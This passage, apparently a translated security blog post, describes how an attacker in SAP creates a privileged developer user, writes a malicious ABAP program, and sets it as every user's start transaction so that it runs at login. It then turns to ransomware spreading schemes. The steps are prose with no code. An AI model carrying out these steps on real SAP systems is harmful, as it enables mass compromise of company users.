For starters, to get RCE on a client’s computer, it is necessary to create a user with developer rights. The user SAP* cannot create or change any programs. To do this, run transaction su01 and copy a user, for example, create a new user with SAP_ALL rights under login EVIL_DEV.
Then, login as the EVIL_DEV user, run transaction se38 and create a program sap_malware_prog.
If a user with developer rights is a new one, the developer key will be needed, which is not a challenge for an attacker.
No comment
Then when we are able to create a program, we click the Insert button, then copy a program, which executes malicious functionality, then save all and activate the program.
The program is created, now we need to create a custom transaction which will launch very malware. For example, we call the transaction MLAUNCHER.
Tie a transaction to a malicious mlauncher functions sap_malware_prog and save it.
However, you can go a step further and set a default transaction. When a user is logged in, transaction mlauncher will start and a machine will run malicious code.
The screenshot shows that we set start transaction – mlauncher for all users.
And then, if you log in an the user in the SAP system, then right after the entrance it will process mlaucher transaction and, for example, launches a calculator.
Тут демо видео.
How can information theft from users' computers harm, say, the company with 1000 users?! Of course by using ransomware.
Protection against ransomware is difficult. Attack ransomware of service is growing more popular since the end 2016.
1. If you are infected, then infect a friend or friends, and you will be unlocked
2. If you want to earn money – spread ransomware and get money
Ransomware is becoming more and more popular, the number of infected user machines is becoming increasing.